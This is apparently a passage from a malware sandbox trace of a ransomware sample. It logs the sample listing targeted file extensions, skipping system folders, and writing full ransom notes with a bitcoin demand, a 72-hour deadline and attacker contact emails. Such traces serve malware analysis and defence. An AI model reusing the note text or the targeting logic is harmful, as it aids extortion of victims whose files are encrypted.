dc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0178.024] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2476512, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb2476512, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb2476512, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x19, dwReserved0=0x0, dwReserved1=0x0, cFileName="refcount.ini", cAlternateFileName="")) returned 0
	[0178.024] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0178.024] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0178.025] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft OneDrive\\setup" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup"
	[0178.033] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*"
	[0178.033] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.034] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.034] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\HELP_DECRYPT_YOUR_FILES.TXT") returned 71
	[0178.034] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.037] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.037] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.040] CloseHandle (hObject=0x384) returned 1
	[0178.040] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.040] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0178.042] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.042] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.042] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.043] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.043] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0178.043] CloseHandle (hObject=0x384) returned 1
	[0178.043] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.044] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.044] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.044] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\HELP_DECRYPT_YOUR_FILES.HTML") returned 72
	[0178.044] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.044] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.044] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0178.048] CloseHandle (hObject=0x384) returned 1
	[0178.048] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.049] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.049] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0178.050] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.051] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.051] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.051] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.051] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0178.051] CloseHandle (hObject=0x384) returned 1
	[0178.052] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xb2476512, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x83a7ca40, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0178.052] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*") returned 47
	[0178.052] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.052] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*", cchLength=0x2f | out: lpsz="c:\\users\\all users\\microsoft onedrive\\setup\\*.*") returned 0x2f
	[0178.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="windows") returned 0x0
	[0178.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="boot") returned 0x0
	[0178.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="system volume information") returned 0x0
	[0178.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="temp") returned 0x0
	[0178.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="program files") returned 0x0
	[0178.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="appdata") returned 0x0
	[0178.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="application data") returned 0x0
	[0178.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="winnt") returned 0x0
	[0178.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="tmp") returned 0x0
	[0178.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="cache") returned 0x0
	[0178.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="webcache") returned 0x0
	[0178.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="inetcache") returned 0x0
	[0178.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="nvidia") returned 0x0
	[0178.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.057] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="packages") returned 0x0
	[0178.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="cookies") returned 0x0
	[0178.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="programdata") returned 0x0
	[0178.076] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0178.076] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0178.076] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xb2476512, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x83a7ca40, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.076] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0178.076] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83a7ca40, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83a7ca40, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83a7ca40, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0178.076] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83a56a71, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83a56a71, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83a7ca40, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0178.076] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2476512, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb2476512, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb2476512, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x19, dwReserved0=0x0, dwReserved1=0x0, cFileName="refcount.ini", cAlternateFileName="")) returned 1
	[0178.076] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2476512, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb2476512, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb2476512, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x19, dwReserved0=0x0, dwReserved1=0x0, cFileName="refcount.ini", cAlternateFileName="")) returned 0
	[0178.077] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0178.077] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0178.077] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 0
	[0178.077] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.077] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0178.078] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1
	[0178.078] lstrcmpW (lpString1="Oracle", lpString2="..") returned 1
	[0178.078] lstrcmpW (lpString1="Oracle", lpString2=".") returned 1
	[0178.078] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0178.078] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0178.078] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Oracle" | out: lpString1="C:\\Users\\All Users\\Oracle") returned="C:\\Users\\All Users\\Oracle"
	[0178.078] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Oracle" | out: lpString1="C:\\Users\\All Users\\Oracle") returned="C:\\Users\\All Users\\Oracle"
	[0178.079] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Oracle\\") returned="C:\\Users\\All Users\\Oracle\\"
	[0178.079] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Oracle\\" | out: lpString1="C:\\Users\\All Users\\Oracle\\") returned="C:\\Users\\All Users\\Oracle\\"
	[0178.079] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Oracle\\*.*") returned="C:\\Users\\All Users\\Oracle\\*.*"
	[0178.079] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\*.*" (normalized: "c:\\users\\all users\\oracle\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.079] lstrlenW (lpString="C:\\Users\\All Users\\Oracle\\*.*") returned 29
	[0178.080] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.080] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Oracle\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\all users\\oracle\\*.*") returned 0x1d
	[0178.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
